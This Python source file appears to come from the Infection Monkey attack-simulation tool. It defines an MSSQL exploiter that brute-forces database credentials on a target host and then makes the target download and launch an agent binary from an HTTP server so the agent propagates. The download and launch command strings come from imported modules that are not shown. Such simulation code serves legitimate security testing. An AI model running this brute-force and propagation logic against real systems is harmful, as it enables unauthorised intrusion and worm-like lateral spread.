import logging
from typing import Iterable, Sequence, Set

from common.credentials import Credentials
from common.types import AgentID, Event, NetworkPort
from infection_monkey.exploit import (
    IAgentOTPProvider,
    IHTTPAgentBinaryServerRegistrar,
    ReservationID,
    use_agent_binary,
)
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.utils.threading import interruptible_iter

from .mssql_client import MSSQLClient
from .mssql_command_builder import (
    build_mssql_agent_download_command,
    build_mssql_agent_launch_command,
)
from .mssql_options import MSSQLOptions

logger = logging.getLogger(__name__)


class MSSQLExploiter:
    """
    Exploits a host through its MSSQL service and attempts to launch an Agent on it.

    Credentials are tried one at a time until one of them results in a successful exploitation
    or the supplied interrupt is set.
    """

    def __init__(
        self,
        agent_id: AgentID,
        mssql_exploit_client: MSSQLClient,
        http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
        otp_provider: IAgentOTPProvider,
    ):
        """
        :param agent_id: ID of the running Agent; passed to the Agent launch command builder
        :param mssql_exploit_client: Client that performs the actual MSSQL exploitation and
            runs the download/launch commands
        :param http_agent_binary_server_registrar: Registrar used to reserve (and afterwards
            clear) a download of the Agent binary for the target host
        :param otp_provider: Passed to the Agent launch command builder
        """
        self._agent_id = agent_id
        self._mssql_exploit_client = mssql_exploit_client
        self._http_agent_binary_server_registrar = http_agent_binary_server_registrar
        self._otp_provider = otp_provider

    def exploit_host(
        self,
        target_host: TargetHost,
        options: MSSQLOptions,
        servers: Sequence[str],
        current_depth: int,
        brute_force_credentials: Sequence[Credentials],
        ports_to_try: Set[NetworkPort],
        interrupt: Event,
    ) -> ExploiterResult:
        """
        Try to exploit `target_host` via MSSQL and launch an Agent on it.

        Unexpected errors are logged and reported through the returned result's
        `error_message` rather than raised.

        :param target_host: The host to exploit
        :param options: MSSQL exploiter options, forwarded to the MSSQL client
        :param servers: Passed to the Agent launch command builder
        :param current_depth: Passed to the Agent launch command builder
        :param brute_force_credentials: Credentials to try, in order
        :param ports_to_try: Ports forwarded to the MSSQL client for every credentials attempt
        :param interrupt: When set, no further credentials are tried
        :return: The outcome of the exploitation/propagation attempt
        """
        logger.info(f"Starting MSSQL exploiter for host: {target_host.ip}")

        try:
            logger.debug("Registering a request for an Agent binary")
            download_ticket = self._http_agent_binary_server_registrar.reserve_download(
                target_host.operating_system,
                target_host.ip,
                use_agent_binary,
            )
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to register a request "
                f"for an agent binary: {err}"
            )
            logger.exception(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

        # Everything that runs after the reservation is made lives inside this try so that the
        # `finally` always clears the reservation, even if building the commands fails.
        try:
            agent_destination_path = get_agent_dst_path(target_host)

            download_agent_command = build_mssql_agent_download_command(
                download_ticket.download_url, agent_destination_path
            )

            launch_agent_command = build_mssql_agent_launch_command(
                self._agent_id, servers, current_depth, agent_destination_path, self._otp_provider
            )

            return self._brute_force_exploit_host(
                target_host,
                options,
                brute_force_credentials,
                download_agent_command,
                launch_agent_command,
                download_ticket.download_completed,
                ports_to_try,
                interrupt,
            )
        except Exception as err:
            msg = (
                "An unexpected exception occurred while "
                f"exploiting host {target_host} with MSSQL: {err}"
            )
            logger.exception(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )
        finally:
            _clear_agent_binary_reservation(
                download_ticket.id, self._http_agent_binary_server_registrar
            )

    def _brute_force_exploit_host(
        self,
        target_host: TargetHost,
        options: MSSQLOptions,
        brute_force_credentials_combinations: Sequence[Credentials],
        download_agent_command: str,
        launch_agent_command: str,
        agent_binary_downloaded: Event,
        ports_to_try: Iterable[NetworkPort],
        interrupt: Event,
    ) -> ExploiterResult:
        """
        Try each set of credentials until one exploits the host or `interrupt` is set.

        :param ports_to_try: Forwarded to the MSSQL client once per credentials attempt, so it
            must be re-iterable (e.g. a set), not a one-shot iterator
        :return: The success flags reported by the MSSQL client for the last credentials tried;
            both flags are False if no credentials were tried
        """
        exploit_result = ExploiterResult(exploitation_success=False, propagation_success=False)

        for propagation_credentials in interruptible_iter(
            brute_force_credentials_combinations, interrupt, "MSSQL exploiter has been interrupted"
        ):
            (
                exploit_result.exploitation_success,
                exploit_result.propagation_success,
            ) = self._mssql_exploit_client.exploit_host(
                target_host,
                options,
                propagation_credentials,
                download_agent_command,
                launch_agent_command,
                agent_binary_downloaded,
                ports_to_try,
            )

            # Once the host has been exploited there is no point trying further credentials.
            if exploit_result.exploitation_success:
                break

        return exploit_result


def _clear_agent_binary_reservation(
    reservation_id: ReservationID,
    http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
):
    """
    Best-effort removal of an Agent binary download reservation.

    Any exception raised while clearing the reservation is logged and suppressed, so this is
    safe to call from a `finally` clause without replacing the caller's return value.

    :param reservation_id: ID of the reservation to clear
    :param http_agent_binary_server_registrar: Registrar whose `clear_reservation` is called
    """
    try:
        debug_message = f"Deregister agent binary request with id: {reservation_id}"
        logger.debug(debug_message)
        clear_reservation = http_agent_binary_server_registrar.clear_reservation
        clear_reservation(reservation_id)
    except Exception:
        # Deliberately swallowed: failing to clean up must not affect the exploitation result.
        logger.exception("An unexpected error occurred while deregistering agent binary request")
